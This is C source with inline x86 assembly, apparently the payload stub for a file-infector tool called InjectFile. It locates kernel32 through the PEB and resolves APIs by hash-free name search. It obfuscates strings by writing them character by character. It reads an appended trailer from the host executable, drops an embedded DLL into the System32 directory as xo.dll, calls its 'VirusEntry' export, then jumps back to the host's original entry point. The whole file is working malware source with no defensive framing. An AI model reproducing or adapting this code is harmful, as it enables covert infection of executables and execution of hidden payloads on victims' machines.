和InjectFile配套TestOne
//#include <iostream>
//using namespace std;
/*int Mystrcmp(const char* s1, const char* s2)
{
while((*s1 != '\0') || (*s2 != '\0')) {
if(*s1 != *s2){
return 0;
}
++s1;
++s2;
}
return 1;
}*/
#include <windows.h>
//#pragma comment(linker,"/sybsystem:console")
#pragma comment(linker, "/subsystem:WINDOWS")
#pragma comment(linker, "/ENTRY:EntryPoint")
struct InjectAppendStruct
{
BYTE szHeadBuf[8]; // 头的8个字节
DWORD vDecHead_Offset; // 目标头8个字节的偏移量
DWORD vDecHead_OriginalOEP; // 目标OEP
DWORD vDecHead_ImageBase; // 目标内存基址
DWORD vown_Offset; // EXE文件偏移量
DWORD vdll_Offset; // DLL文件偏移量
DWORD vdll_Size; // DLL文件大小
char vdll_flag[4]; // 标识ZMEP
};
int Mystrcmp(const char* s1, const char* s2)
{
while((*s1 != '\0') || (*s2 != '\0')) {
if(*s1 != *s2){
return 0;
}
++s1;
++s2;
}
return 1;
}
static void * __stdcall SearchAPI ( char *BASE, unsigned long *EAT, unsigned long *ENPT, unsigned short *EOT, unsigned long num, char *name )
{
unsigned long index = 0;
char *function_name = 0;
void *function_addr = 0;
for ( index = 0; index < num; index++ )
{
function_name = ENPT[index] + BASE;
/*
* 大小写敏感比较
*/
if ( 1 == Mystrcmp( function_name, name ) )
{
index = EOT[index];
function_addr = EAT[index] + BASE;
return( function_addr );
}
}
return 0;
}
int main()
{
return 0;
}
int EntryPoint()
{
void *PEB = 0,
*Ldr = 0,
*Flink = 0,
*kernel32_BaseAddress = 0,
*kernel32_BaseDllName = 0,
*ExportDirectory = 0,
*PrivateLoadLibraryA = 0,
*PrivateGetProcAddress = 0;
unsigned long NumberOfNames = 0,
*AddressOfFunctions = 0,
*AddressOfNames = 0;
unsigned short *AddressOfNameOrdinals = 0;
long e_lfanew = 0;
__asm
{
mov eax,fs:[0x30]
mov PEB,eax
mov eax,[eax+0ch]
mov Ldr,eax
mov esi,[eax+1ch];
mov Flink, esi;
mov ebx,[esi] ;Flink???
lodsd
mov edx, [eax + 8]
mov kernel32_BaseAddress,edx
mov ebx,[ebx+20h]
mov kernel32_BaseDllName,ebx
;??GetProcAddress LoadLibrary
mov ebx, kernel32_BaseAddress;
mov eax, [ebx+3Ch]
mov e_lfanew,eax
mov eax, kernel32_BaseAddress
mov edx,eax
mov ebx, e_lfanew;
add ebx, 078h
mov eax,[eax+ebx]
add eax,edx
mov ExportDirectory,eax
mov ecx,eax
mov eax,[eax+018h]
mov NumberOfNames,eax
mov eax,ExportDirectory;
mov eax,[eax+01Ch]
mov edx, kernel32_BaseAddress
add eax,edx
mov AddressOfFunctions,eax
mov eax,ExportDirectory;
mov eax,[eax+020h]
add eax,edx
mov AddressOfNames,eax
mov eax,ExportDirectory;
mov eax,[eax+024h];
add eax,edx
mov AddressOfNameOrdinals,eax
}
/*printf("PEB = 0x%08X\n", PEB );
printf("Ldr = 0x%08X\n", Ldr);
printf("Flink = 0x%08X\n", Flink);
printf("kernel32_BaseAddress = 0x%08X\n", kernel32_BaseAddress);
wprintf(L"kernel32_BAseDllName = %s\n", kernel32_BaseDllName);
printf("e_lfanew = 0x%08X\n", e_lfanew);
printf("ExportDirectory = 0x%08X\n", ExportDirectory);
printf("NumberOfNames = %u\n", NumberOfNames);
printf("AddressOfFunctions = 0x%08X\n", AddressOfFunctions);
printf("AddressOfNames = 0x%08X\n", AddressOfNames);
printf("AddressOfNameOrdinals = 0x%08X\n", AddressOfNameOrdinals);*/
///=======================================================
char szFuncLoadLibrary[13];
szFuncLoadLibrary[0] = 'L';
szFuncLoadLibrary[1] = 'o';
szFuncLoadLibrary[2] = 'a';
szFuncLoadLibrary[3] = 'd';
szFuncLoadLibrary[4] = 'L';
szFuncLoadLibrary[5] = 'i';
szFuncLoadLibrary[6] = 'b';
szFuncLoadLibrary[7] = 'r';
szFuncLoadLibrary[8] = 'a';
szFuncLoadLibrary[9] = 'r';
szFuncLoadLibrary[10] = 'y';
szFuncLoadLibrary[11] = 'A';
szFuncLoadLibrary[12] = '\0';
char szFuncGetProcAddress[15];
szFuncGetProcAddress[0] = 'G';
szFuncGetProcAddress[1] = 'e';
szFuncGetProcAddress[2] = 't';
szFuncGetProcAddress[3] = 'P';
szFuncGetProcAddress[4] = 'r';
szFuncGetProcAddress[5] = 'o';
szFuncGetProcAddress[6] = 'c';
szFuncGetProcAddress[7] = 'A';
szFuncGetProcAddress[8] = 'd';
szFuncGetProcAddress[9] = 'd';
szFuncGetProcAddress[10] = 'r';
szFuncGetProcAddress[11] = 'e';
szFuncGetProcAddress[12] = 's';
szFuncGetProcAddress[13] = 's';
szFuncGetProcAddress[14] = '\0';
// SearchAPI
PrivateLoadLibraryA = SearchAPI
(
(char*)kernel32_BaseAddress,
AddressOfFunctions,
AddressOfNames,
AddressOfNameOrdinals,
NumberOfNames,
szFuncLoadLibrary
);
//printf( "PrivateLoadLibraryA = 0x%08X\n", PrivateLoadLibraryA );
//printf( "LoadLibraryA = 0x%08X\n", LoadLibraryA );
PrivateGetProcAddress = SearchAPI
(
(char*)kernel32_BaseAddress,
AddressOfFunctions,
AddressOfNames,
AddressOfNameOrdinals,
NumberOfNames,
szFuncGetProcAddress
);
//printf( "PrivateGetProcAddress = 0x%08X\n", PrivateGetProcAddress );
//printf( "GetProcAddress = 0x%08X\n", GetProcAddress );
/*unsigned long index = 0;
char *function_name = 0;
void *function_addr = 0;
for ( index = 0; index < NumberOfNames; index++ )
{
function_name = AddressOfNames[index] + (char*)kernel32_BaseAddress;
//
// ???????
//
//Mystrcmp比较字符串
int tmp_strcmp = 1;
char* s1 = function_name;
char* s2 = szFuncLoadLibrary;
while((*s1 != '\0') || (*s2 != '\0')) {
if(*s1 != *s2){
tmp_strcmp = 0;
break;
}
s1++;
s2++;
}
if ( 0 != tmp_strcmp )
{
index = AddressOfNameOrdinals[index];
function_addr = AddressOfFunctions[index] + (char*)kernel32_BaseAddress;
break;
}
}*/
//??API
/*PrivateLoadLibraryA = SearchAPI
(
(char*)kernel32_BaseAddress,
AddressOfFunctions,
AddressOfNames,
AddressOfNameOrdinals,
NumberOfNames,
"LoadLibraryA"
);*/
//PrivateLoadLibraryA = function_addr;
//printf( "PrivateLoadLibraryA = 0x%08X\n", PrivateLoadLibraryA );
/*for ( index = 0; index < NumberOfNames; index++ )
{
function_name = AddressOfNames[index] + (char*)kernel32_BaseAddress;
//
// ???????
//
//比较字符串
int tmp_strcmp = 1;
char* s1 = function_name;
char* s2 = szFuncGetProcAddress;
while((*s1 != '\0') || (*s2 != '\0')) {
if(*s1 != *s2){
tmp_strcmp = 0;
break;
}
s1++;
s2++;
}
if ( 0 != tmp_strcmp )
{
index = AddressOfNameOrdinals[index];
function_addr = AddressOfFunctions[index] + (char*)kernel32_BaseAddress;
break;
}
} */
//PrivateGetProcAddress = function_addr;
/*PrivateGetProcAddress = SearchAPI
(
(char*)kernel32_BaseAddress,
AddressOfFunctions,
AddressOfNames,
AddressOfNameOrdinals,
NumberOfNames,
"GetProcAddress"
);
*/
//printf( "PrivateGetProcAddress = 0x%08X\n", PrivateGetProcAddress );
// 导出文件读写API函数
void* v_CreateFileA = 0;
void* v_ReadFile = 0;
void* v_WriteFile = 0;
void* v_SetFilePointer = 0;
void* v_GetModuleFileName = 0;
void* v_CloseHandle = 0;
void* v_VirtualAlloc = 0;
void* v_VirtualFree = 0;
void* v_GetSystemDirectoryA = 0;
void* v_MoveFileA = 0;
void* v_lstrcat = 0;
void* v_GetCurrentProcessId = 0;
void* v_OpenProcess = 0;
void* v_WriteProcessMemory = 0;
void* v_lstrcpyn = 0;
char szCreateFileA[12] = "CreateFileA";
szCreateFileA[0] = 'C';
szCreateFileA[1] = 'r';
szCreateFileA[2] = 'e';
szCreateFileA[3] = 'a';
szCreateFileA[4] = 't';
szCreateFileA[5] = 'e';
szCreateFileA[6] = 'F';
szCreateFileA[7] = 'i';
szCreateFileA[8] = 'l';
szCreateFileA[9] = 'e';
szCreateFileA[10] = 'A';
szCreateFileA[11] = '\0';
char szReadFile[9] = "ReadFile";
szReadFile[0] = 'R';
szReadFile[1] = 'e';
szReadFile[2] = 'a';
szReadFile[3] = 'd';
szReadFile[4] = 'F';
szReadFile[5] = 'i';
szReadFile[6] = 'l';
szReadFile[7] = 'e';
szReadFile[8] = '\0';
char szWriteFile[14] = "WriteFile";
szWriteFile[0] = 'W';
szWriteFile[1] = 'r';
szWriteFile[2] = 'i';
szWriteFile[3] = 't';
szWriteFile[4] = 'e';
szWriteFile[5] = 'F';
szWriteFile[6] = 'i';
szWriteFile[7] = 'l';
szWriteFile[8] = 'e';
szWriteFile[9] = '\0';
char szSetFilePointer[15] = "SetFilePointer";
szSetFilePointer[0] = 'S';
szSetFilePointer[1] = 'e';
szSetFilePointer[2] = 't';
szSetFilePointer[3] = 'F';
szSetFilePointer[4] = 'i';
szSetFilePointer[5] = 'l';
szSetFilePointer[6] = 'e';
szSetFilePointer[7] = 'P';
szSetFilePointer[8] = 'o';
szSetFilePointer[9] = 'i';
szSetFilePointer[10] = 'n';
szSetFilePointer[11] = 't';
szSetFilePointer[12] = 'e';
szSetFilePointer[13] = 'r';
szSetFilePointer[14] = '\0';
char szGetModuleFileName[19];
szGetModuleFileName[0] = 'G';
szGetModuleFileName[1] = 'e';
szGetModuleFileName[2] = 't';
szGetModuleFileName[3] = 'M';
szGetModuleFileName[4] = 'o';
szGetModuleFileName[5] = 'd';
szGetModuleFileName[6] = 'u';
szGetModuleFileName[7] = 'l';
szGetModuleFileName[8] = 'e';
szGetModuleFileName[9] = 'F';
szGetModuleFileName[10] = 'i';
szGetModuleFileName[11] = 'l';
szGetModuleFileName[12] = 'e';
szGetModuleFileName[13] = 'N';
szGetModuleFileName[14] = 'a';
szGetModuleFileName[15] = 'm';
szGetModuleFileName[16] = 'e';
szGetModuleFileName[17] = 'A';
szGetModuleFileName[18] = '\0';
char szCloseHandle[12] = "CloseHandle";
szCloseHandle[0] = 'C';
szCloseHandle[1] = 'l';
szCloseHandle[2] = 'o';
szCloseHandle[3] = 's';
szCloseHandle[4] = 'e';
szCloseHandle[5] = 'H';
szCloseHandle[6] = 'a';
szCloseHandle[7] = 'n';
szCloseHandle[8] = 'd';
szCloseHandle[9] = 'l';
szCloseHandle[10] = 'e';
szCloseHandle[11] = '\0';
char szVirtualAlloc[13] = "VirtualAlloc";
szVirtualAlloc[0] = 'V';
szVirtualAlloc[1] = 'i';
szVirtualAlloc[2] = 'r';
szVirtualAlloc[3] = 't';
szVirtualAlloc[4] = 'u';
szVirtualAlloc[5] = 'a';
szVirtualAlloc[6] = 'l';
szVirtualAlloc[7] = 'A';
szVirtualAlloc[8] = 'l';
szVirtualAlloc[9] = 'l';
szVirtualAlloc[10] = 'o';
szVirtualAlloc[11] = 'c';
szVirtualAlloc[12] = '\0';
char szVirtualFree[12] = "VirtualFree";
szVirtualFree[0] = 'V';
szVirtualFree[1] = 'i';
szVirtualFree[2] = 'r';
szVirtualFree[3] = 't';
szVirtualFree[4] = 'u';
szVirtualFree[5] = 'a';
szVirtualFree[6] = 'l';
szVirtualFree[7] = 'F';
szVirtualFree[8] = 'r';
szVirtualFree[9] = 'e';
szVirtualFree[10] = 'e';
szVirtualFree[11] = '\0';
char szGetSystemDirectoryA[20];
szGetSystemDirectoryA[0] = 'G';
szGetSystemDirectoryA[1] = 'e';
szGetSystemDirectoryA[2] = 't';
szGetSystemDirectoryA[3] = 'S';
szGetSystemDirectoryA[4] = 'y';
szGetSystemDirectoryA[5] = 's';
szGetSystemDirectoryA[6] = 't';
szGetSystemDirectoryA[7] = 'e';
szGetSystemDirectoryA[8] = 'm';
szGetSystemDirectoryA[9] = 'D';
szGetSystemDirectoryA[10] = 'i';
szGetSystemDirectoryA[11] = 'r';
szGetSystemDirectoryA[12] = 'e';
szGetSystemDirectoryA[13] = 'c';
szGetSystemDirectoryA[14] = 't';
szGetSystemDirectoryA[15] = 'o';
szGetSystemDirectoryA[16] = 'r';
szGetSystemDirectoryA[17] = 'y';
szGetSystemDirectoryA[18] = 'A';
szGetSystemDirectoryA[19] = '\0';
char szMoveFileA[10];
szMoveFileA[0] = 'M';
szMoveFileA[1] = 'o';
szMoveFileA[2] = 'v';
szMoveFileA[3] = 'e';
szMoveFileA[4] = 'F';
szMoveFileA[5] = 'i';
szMoveFileA[6] = 'l';
szMoveFileA[7] = 'e';
szMoveFileA[8] = 'A';
szMoveFileA[9] = '\0';
char szlstrcat[12];
szlstrcat[0] = 'l';
szlstrcat[1] = 's';
szlstrcat[2] = 't';
szlstrcat[3] = 'r';
szlstrcat[4] = 'c';
szlstrcat[5] = 'a';
szlstrcat[6] = 't';
szlstrcat[7] = '\0';
char szGetCurrentProcessId[20] = "GetCurrentProcessId";
szGetCurrentProcessId[0] = 'G';
szGetCurrentProcessId[1] = 'e';
szGetCurrentProcessId[2] = 't';
szGetCurrentProcessId[3] = 'C';
szGetCurrentProcessId[4] = 'u';
szGetCurrentProcessId[5] = 'r';
szGetCurrentProcessId[6] = 'r';
szGetCurrentProcessId[7] = 'e';
szGetCurrentProcessId[8] = 'n';
szGetCurrentProcessId[9] = 't';
szGetCurrentProcessId[10] = 'P';
szGetCurrentProcessId[11] = 'r';
szGetCurrentProcessId[12] = 'o';
szGetCurrentProcessId[13] = 'c';
szGetCurrentProcessId[14] = 'e';
szGetCurrentProcessId[15] = 's';
szGetCurrentProcessId[16] = 's';
szGetCurrentProcessId[17] = 'I';
szGetCurrentProcessId[18] = 'd';
szGetCurrentProcessId[19] = '\0';
char szWriteProcessMemory[19] = "WriteProcessMemory";
szWriteProcessMemory[0] = 'W';
szWriteProcessMemory[1] = 'r';
szWriteProcessMemory[2] = 'i';
szWriteProcessMemory[3] = 't';
szWriteProcessMemory[4] = 'e';
szWriteProcessMemory[5] = 'P';
szWriteProcessMemory[6] = 'r';
szWriteProcessMemory[7] = 'o';
szWriteProcessMemory[8] = 'c';
szWriteProcessMemory[9] = 'e';
szWriteProcessMemory[10] = 's';
szWriteProcessMemory[11] = 's';
szWriteProcessMemory[12] = 'M';
szWriteProcessMemory[13] = 'e';
szWriteProcessMemory[14] = 'm';
szWriteProcessMemory[15] = 'o';
szWriteProcessMemory[16] = 'r';
szWriteProcessMemory[17] = 'y';
szWriteProcessMemory[18] = '\0';
char szOpenProcess[19] = "OpenProcess";
szOpenProcess[0] = 'O';
szOpenProcess[1] = 'p';
szOpenProcess[2] = 'e';
szOpenProcess[3] = 'n';
szOpenProcess[4] = 'P';
szOpenProcess[5] = 'r';
szOpenProcess[6] = 'o';
szOpenProcess[7] = 'c';
szOpenProcess[8] = 'e';
szOpenProcess[9] = 's';
szOpenProcess[10] = 's';
szOpenProcess[11] = '\0';
char szlstrcpyn[9];
szlstrcpyn[0] = 'l';
szlstrcpyn[1] = 's';
szlstrcpyn[2] = 't';
szlstrcpyn[3] = 'r';
szlstrcpyn[4] = 'c';
szlstrcpyn[5] = 'p';
szlstrcpyn[6] = 'y';
szlstrcpyn[7] = 'n';
szlstrcpyn[8] = '\0';
v_CreateFileA = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szCreateFileA);
v_ReadFile = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szReadFile);
v_WriteFile = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szWriteFile);
v_SetFilePointer = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szSetFilePointer);
v_GetModuleFileName = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szGetModuleFileName);
v_CloseHandle = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szCloseHandle);
v_VirtualAlloc = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szVirtualAlloc);
v_VirtualFree = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szVirtualFree);
v_GetSystemDirectoryA = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szGetSystemDirectoryA);
v_MoveFileA = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szMoveFileA);
v_lstrcat = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szlstrcat);
v_GetCurrentProcessId = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szGetCurrentProcessId);
v_WriteProcessMemory = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szWriteProcessMemory);
v_OpenProcess = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szOpenProcess);
v_lstrcpyn = SearchAPI((char*)kernel32_BaseAddress, AddressOfFunctions,
AddressOfNames, AddressOfNameOrdinals,
NumberOfNames, szlstrcpyn);
//printf("v_C: 0x%X\n", v_CreateFileA);
//printf("v_R: 0x%X\n", v_ReadFile);
//printf("v_W: 0x%X\n", v_WriteFile);
//printf("v_S: 0x%X\n", v_SetFilePointer);
//printf("v_G: 0x%X\n", v_GetModuleFileName);
// 读写文件
const int bufSize = 260;
char szFileName[bufSize];
if(v_CreateFileA)
{
__asm
{
push bufSize;
lea eax, szFileName;
push eax;
push 0;
call v_GetModuleFileName; 获取当前目标文件名
}
//创建文件
int fileAttribute = FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN;
char szText[9];
szText[0] = 't';
szText[1] = 'e';
szText[2] = 's';
szText[3] = 't';
szText[4] = '.';
szText[5] = 't';
szText[6] = 'x';
szText[7] = 't';
szText[8] = '\0';
InjectAppendStruct tmpAStruc; //附件结构,从尾读入
void* hWrite = 0;
void* hRead = 0;
// 创建写文件
__asm
{
push 0;
push fileAttribute;
push CREATE_ALWAYS;
push 0;
push 0;
push GENERIC_WRITE;
lea ebx, szText;
push ebx;
call v_CreateFileA;
mov hWrite, eax;
}
__asm
{
push 0;
push fileAttribute;
push OPEN_ALWAYS;
push 0;
push 0;
push GENERIC_READ;
lea ebx, szFileName;
push ebx;
call v_CreateFileA;
mov hRead, eax;
}
// 读写文件
DWORD ReadNum = 0;
DWORD ReadttenNum = 0;
DWORD AppendStrucSize = sizeof(tmpAStruc);
AppendStrucSize = -AppendStrucSize;
//设置读文件指针
__asm
{
push FILE_END; // 移动方法
push 0;
push AppendStrucSize; // 偏移字节
push hRead;
call v_SetFilePointer;
}
AppendStrucSize = -AppendStrucSize;
// 读写文件
__asm
{
push 0;
lea ebx, ReadttenNum;
push ebx;
push AppendStrucSize;
lea ebx, tmpAStruc;
push ebx;
push hRead;
call v_ReadFile;
}
__asm
{
push 0;
lea ebx, ReadttenNum;
push ebx;
push AppendStrucSize;
lea ebx, tmpAStruc;
push ebx;
push hWrite;
call v_WriteFile;
}
// 创建DLL文件,将DLL文件写出来
// 建立一个大的缓冲区, 为类似 C:\\Windows\System32\xo.dll 就可以了。
void* hDLL = 0;
char szDLLName[260];
szDLLName[0] = 'x';
szDLLName[1] = 'o';
szDLLName[2] = '.';
szDLLName[3] = 'd';
szDLLName[4] = 'l';
szDLLName[5] = 'l';
szDLLName[6] = '\0';
//获取系统目录
// 获取系统目录
char szSysDirBuf[260];
char szAfterDLLName[8];
szAfterDLLName[0] = '\\';
szAfterDLLName[1] = 'x';
szAfterDLLName[2] = 'o';
szAfterDLLName[3] = '.';
szAfterDLLName[4] = 'd';
szAfterDLLName[5] = 'l';
szAfterDLLName[6] = 'l';
szAfterDLLName[7] = '\0';
__asm
{
push 260;
lea ebx, szSysDirBuf;
push ebx;
call v_GetSystemDirectoryA;
lea ebx, szAfterDLLName;
push ebx;
lea ebx, szSysDirBuf;
push ebx;
call v_lstrcat;
}
int hModule = 0;
char szBuf[11];
szBuf[0] = 'u';
szBuf[1] = 's';
szBuf[2] = 'e';
szBuf[3] = 'r';
szBuf[4] = '3';
szBuf[5] = '2';
szBuf[6] = '.';
szBuf[7] = 'd';
szBuf[8] = 'l';
szBuf[9] = 'l';
szBuf[10] = '\0';
char szMessage[12];
szMessage[0] = 'M';
szMessage[1] = 'e';
szMessage[2] = 's';
szMessage[3] = 's';
szMessage[4] = 'a';
szMessage[5] = 'g';
szMessage[6] = 'e';
szMessage[7] = 'B';
szMessage[8] = 'o';
szMessage[9] = 'x';
szMessage[10] = 'A';
szMessage[11] = '\0';
char szwsprintfA[10];
szwsprintfA[0] = 'w';
szwsprintfA[1] = 's';
szwsprintfA[2] = 'p';
szwsprintfA[3] = 'r';
szwsprintfA[4] = 'i';
szwsprintfA[5] = 'n';
szwsprintfA[6] = 't';
szwsprintfA[7] = 'f';
szwsprintfA[8] = 'A';
szwsprintfA[9] = '\0';
void* v_MessageBox = 0;
void* v_wsprintfA = 0;
__asm
{
//mov eax,PrivateLoadLibraryA;
//mov ebx,PrivateGetProcAddress;
lea ecx,szBuf;
push ecx;
call PrivateLoadLibraryA;
mov hModule,eax
lea ecx,szMessage
push ecx
push hModule;
call PrivateGetProcAddress;
mov v_MessageBox, eax; // 获取MessageBoxA指针
// eax被抹掉了
lea ecx, szwsprintfA;
push ecx;
push hModule;
call PrivateGetProcAddress;
mov v_wsprintfA, eax;
}
// 创建xo.dll
__asm
{
push 0;
push fileAttribute;
push CREATE_ALWAYS;
push 0;
push 0;
push GENERIC_WRITE;
lea ebx, szSysDirBuf;
push ebx;
call v_CreateFileA;
mov hDLL, eax;
}
// 设置文件偏移地址
BYTE *dllBuf = 0;
void *lpDLL = 0;
__asm
{
push PAGE_READWRITE;
push MEM_COMMIT;
push tmpAStruc.vdll_Size;
push 0;
call v_VirtualAlloc;
mov lpDLL, eax;
}
__asm
{
push FILE_BEGIN; // 移动方法
push 0;
push tmpAStruc.vdll_Offset; // 偏移字节
push hRead;
call v_SetFilePointer;
}
// 从目标文件中读DLL文件,并写出
__asm
{
push 0;
lea ebx, ReadttenNum;
push ebx;
push tmpAStruc.vdll_Size; // 读文件大小
push lpDLL; // 缓冲地址
push hRead;
call v_ReadFile;
}
// 写文件
__asm
{
push 0;
lea ebx, ReadttenNum;
push ebx;
push tmpAStruc.vdll_Size;
push lpDLL;
push hDLL;
call v_WriteFile;
}
//关闭文件句柄
__asm
{
push hDLL;
call v_CloseHandle;
push hWrite;
call v_CloseHandle;
push hRead;
call v_CloseHandle;
//VirtualFree
push MEM_RELEASE;
push 0;
push lpDLL;
call v_VirtualFree;
}
//szDLLName
char szDLLEntry[11] = "VirusEntry";
szDLLEntry[0] = 'V';
szDLLEntry[1] = 'i';
szDLLEntry[2] = 'r';
szDLLEntry[3] = 'u';
szDLLEntry[4] = 's';
szDLLEntry[5] = 'E';
szDLLEntry[6] = 'n';
szDLLEntry[7] = 't';
szDLLEntry[8] = 'r';
szDLLEntry[9] = 'y';
szDLLEntry[10] = '\0';
// 导出xo.dll文件后 加载文件,并调用VirusEntry函数
int hDLLHDL = 0;
__asm
{
lea ebx, szDLLName;
push ebx;
call PrivateLoadLibraryA;
mov hDLLHDL, eax;
lea ebx, szDLLEntry;
push ebx;
push hDLLHDL;
call PrivateGetProcAddress;
call eax;
//加载wsprintfA
}
// 完成跳回 - 计算内存地址
// 再返回头VirtualAlloc 然后 复制 RtlFillMemory , VirtualFree
void* opHeadCode = NULL;
BYTE szopHeadBuf[260];
BYTE sztmpopBuf[4] = {0};
sztmpopBuf[0] = '\xE9';
DWORD opHeadCodeSize = sizeof(tmpAStruc.szHeadBuf);
DWORD jmpOPOffset = tmpAStruc.vDecHead_OriginalOEP + tmpAStruc.vDecHead_ImageBase + 5;
__asm
{
push PAGE_EXECUTE_READWRITE;
push MEM_COMMIT;
push 0x01000; // 4KB内存
push 0;
call v_VirtualAlloc;
mov opHeadCode, eax;
}
__asm
{
//计算jmp 指令
add eax, 0x05;
mov ebx, jmpOPOffset;
sub ebx, eax;
sub ebx, 0x05;
//mov eax, tmpAStruc.vDecHead_ImageBase;
//add ebx, eax;
mov jmpOPOffset, ebx;
}
__asm
{
//执行 逐个字节复制过去 8次
lea ebx, tmpAStruc.szHeadBuf;
mov eax, [ebx];
mov edx, opHeadCode;
mov [edx], eax;
mov eax, [ebx+4];
mov [edx+4], eax;
//为其补个零
mov eax, opHeadCode;
mov [eax+8], 0;
//获取串地址
lea ebx, sztmpopBuf;
mov edx, [ebx];
mov [eax+5], edx;
mov edx, jmpOPOffset;
mov [eax+6], edx;
}
__asm
{
jmp opHeadCode;
}
//wsprintf(szHeadOPBuf, "E9%d", &jmpOPOffset);
//lstrcat(opHeadCode, szHeadOPBuf);
/*
// 调用MessageBox
__asm
{
lea ecx, szSysDirBuf
push 0
push ecx
push ecx
push 0
call v_MessageBox
}
*/
}
return 0;
}
